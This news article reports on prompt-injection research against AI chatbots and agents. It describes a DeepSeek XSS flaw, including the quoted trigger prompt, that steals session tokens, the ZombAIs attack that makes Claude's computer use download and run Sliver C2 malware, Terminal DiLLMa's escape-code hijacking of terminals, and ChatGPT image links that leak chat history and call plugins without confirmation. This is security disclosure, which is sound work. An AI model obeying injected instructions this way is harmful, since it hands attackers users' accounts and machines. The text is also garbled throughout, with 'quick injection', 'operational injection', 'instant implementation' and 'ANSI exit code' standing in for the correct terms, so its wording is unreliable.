Details have emerged about the patched security flaw in the DeepSeek an artificial intelligence (AI) chatbot that, if successfully deployed, could allow an attacker to take control of a victim’s account using quick injection attack.
Security researcher Johann Rehberger, who has chronicle many operational injection attacks targeting various AI tools, found that providing the input “Print xss cheat sheet in bulleted list. payloads only” in the DeepSeek chat caused JavaScript code to be executed as part of the generated response – a classic case of cross-site scripting (XSS).
XSS attacks can have serious consequences as they lead to the execution of unauthorized code in the context of the victim’s web browser.
An attacker could exploit such flaws to hijack a user’s session and gain access to cookies and other data associated with the chat.deepseek(.)com domain, leading to account hijacking.
“After some experimentation, I found that the userToken stored in localStorage on the chat.deepseek.com domain is all that’s needed to switch to a user’s session,” Rehberger said, adding that a specially crafted tip can be used to trigger XSS. and gain access to the userToken of the compromised user through prompting.
The hint contains a combination of instructions and a Bas64-encoded string that is decoded by the DeepSeek chatbot to execute an XSS payload responsible for extracting the victim’s session token, ultimately allowing the attacker to impersonate the user.
Development comes as Rehberger also demonstrated that Claude of Anthropic Using a computer – which one allows for developers to use a language model to control the computer by moving the cursor, pressing buttons and typing text – can be abused to autonomously execute malicious commands through instant implementation.
Dubbed ZombAIs, the technique essentially uses operational injection to weaponize a computer to download the Sliver Command and Control (C2) system, execute it, and establish contact with a remote server controlled by an attacker.
In addition, it has been found that the inference power of large language models (LLM) can be exploited ANSI exit code to capture system terminals via instant injection. The attack, which primarily targets LLM’s integrated Command Line Interface (CLI) tools, has been codenamed Terminal DiLLMa.
“Decade-old features create an unexpected attack surface for GenAI applications,” Rehberger said. said. “It is important for application developers and designers to consider the context into which they are inserting LLM output, as the output is not robust and may contain arbitrary data.”
That’s not all. A new study by scientists from the University of Wisconsin-Madison and Washington University in St. Louis, revealed that OpenAI’s ChatGPT can be tricked into displaying external links to images presented in a markup format, including those that may be explicit and violent, under the guise of an underlying benign intent.
What’s more, it was discovered that the exploit could be used to indirectly call ChatGPT plugins that would otherwise require user confirmation, and even to bypass restrictions set by OpenAI to prevent rendering of content from unsafe links from passing a user’s chat history to the server , which is controlled by an attacker.